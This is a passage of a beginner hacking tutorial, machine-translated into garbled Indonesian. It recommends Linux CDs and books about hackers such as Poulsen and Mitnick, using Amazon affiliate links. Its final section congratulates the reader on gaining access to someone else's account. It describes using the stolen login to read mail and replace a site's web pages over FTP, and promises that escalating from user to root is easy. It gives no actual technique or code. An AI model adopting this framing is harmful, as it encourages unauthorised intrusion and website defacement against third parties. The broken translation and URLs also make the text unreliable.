Jadi, pastikan Anda mendapatkan kesepakatan yang memberi Anda kesempatan untuk memeriksa beberapa dari distribusi yang berbeda. Sejauh kesepakatan Linux terbaik yang pernah ditemukan sekitar
satu ini <http://www.amazon.com/exec/obidos / ASIN/0789717468/thenewbiesarea>.
Ini memiliki petunjuk Linux yang sangat bagus, dan dilengkapi dengan tiga distribusi Linux yang terpisah pada 3 CD, termasuk RedHat sangat terbaru dan Slackware.
Ini juga nilai yang sangat baik (sekitar setengah harga dari membeli 'resmi' tunggal RedHat CD).

TIDAK PENTING, NAMUN BUKU RECOMMENDED:

(Buku-buku ini terutama hanya bagian dari Budaya Hacker)

3
THE <http://www.amazon.com/exec/obidos/ASIN/0316528579/thenewbiesarea> Watchman:.
Kehidupan twisted dan Kejahatan Hacker Serial Kevin Poulsen: Yang satu ini tidak akan mengajarkan Anda apa-apa, sehingga hal itu jika Anda hanya ingin belajar.
Meskipun salah satu yang terbaik yang pernah saya miliki membaca.
Lainnya seperti sebuah buku thriller, tapi itu nyata!
Kevin Mitnick buku hampir sama, tapi ini salah satunya menangani banyak dengan phreaking, dan menipu stasiun radio mobil.
Tapi, seperti saya katakan, itu tidak pergi melalui teknik, sehingga hal itu jika Anda hanya ingin belajar hal-hal.

4
THE <http://www.amazon.com/exec/obidos/ASIN/0316528692/thenewbiesarea> Fugitive PERTANDINGAN:.
Online Dengan Kevin Mitnick: Sekali lagi, membaca benar-benar menyenangkan (meskipun, saya lebih memilih buku Poulsen) tapi itu tidak jadi 't pergi melalui teknik hacking.
Tapi aku harus daftar di sini karena itu adalah membaca yang baik.
Ini juga membeli benar-benar murah.

5
Takedown <http://www.amazon.com/exec/obidos/ASIN/0786889136/thenewbiesarea>:.
The Pursuit dan Capture Kevin Mitnick: Ini adalah sisi lain dari kisah Mitnick (ditulis oleh polisi yang mengejarnya ).
Menarik, namun buku Mitnick penting adalah yang di atas.
Meskipun, ini adalah buku yang sangat baik tentang bagaimana FBI beroperasi untuk menangkap hacker.
Tapi, sekali lagi, tidak ada techniqes terdaftar.
Untuk teknik, Anda hanya akan memiliki keberuntungan dalam dua buku pertama yang terdaftar.

Oke, seperti untuk buku pemrograman - hal itu.
Anda dapat men-download hal-hal gratis jika Anda mencari "+ tutorial pemrograman perl +" dan hal-hal seperti itu.
Kecuali Anda seperti buku cetak, lupa bahwa.
Jadi, satu-satunya hal lainnya adalah Linux.
Anda akan perlu memiliki Linux sebagai pilihan dual boot pada PC Anda jika Anda ingin melakukan hacking serius.

Beberapa buku yang menyedot: ini adalah beberapa buku yang terjadi di sekitar yang merupakan rip-off
RAHASIA DARI HACKER <http://www.amazon.com/exec/obidos/ASIN/1559501065/thenewbiesarea> SUPER:.
Ini adalah buku yang banyak orang miliki.
Buku ini tampak seperti menyia-nyiakan waktu untuk saya.

Jadi, terus melalui tutorial ini karena mendapat lebih besar, membaca apa pun yang Anda temukan di web.
Dapatkan beberapa buku utama di atas, setidaknya 1 dan 2, dan membacanya sangat hati-hati - empat atau lima kali.
Gabung ke grup lokal Linux Anda pengguna, jika Anda memiliki satu.
Dan, kemudian, men-download beberapa panduan tentang pemrograman dan membaca melalui mereka ketika Anda mendapatkan beberapa waktu.
Dengan beberapa usaha (tidak mudah), Anda dapat menjadi seorang hacker dihormati dan menguasai Net.


 

[Kembali ke Indeks]


 

SELAMAT:

Anda telah mendapatkan akses.

Jika Anda sekarang memiliki kode login dan password, Anda dapat menggunakan account pengguna mail, FTP priviliges (mengubah halaman web mereka dengan meng-upload yang baru), dan akses HTTP.

(Jika Anda hanya punya akses ke account tingkat pengguna, jangan putus asa Jika Anda memiliki account tingkat pengguna, mudah untuk menggunakannya untuk kemudian mendapatkan account tingkat akar.. Lebih lanjut tentang ini ketika studi ini dibuat lebih besar).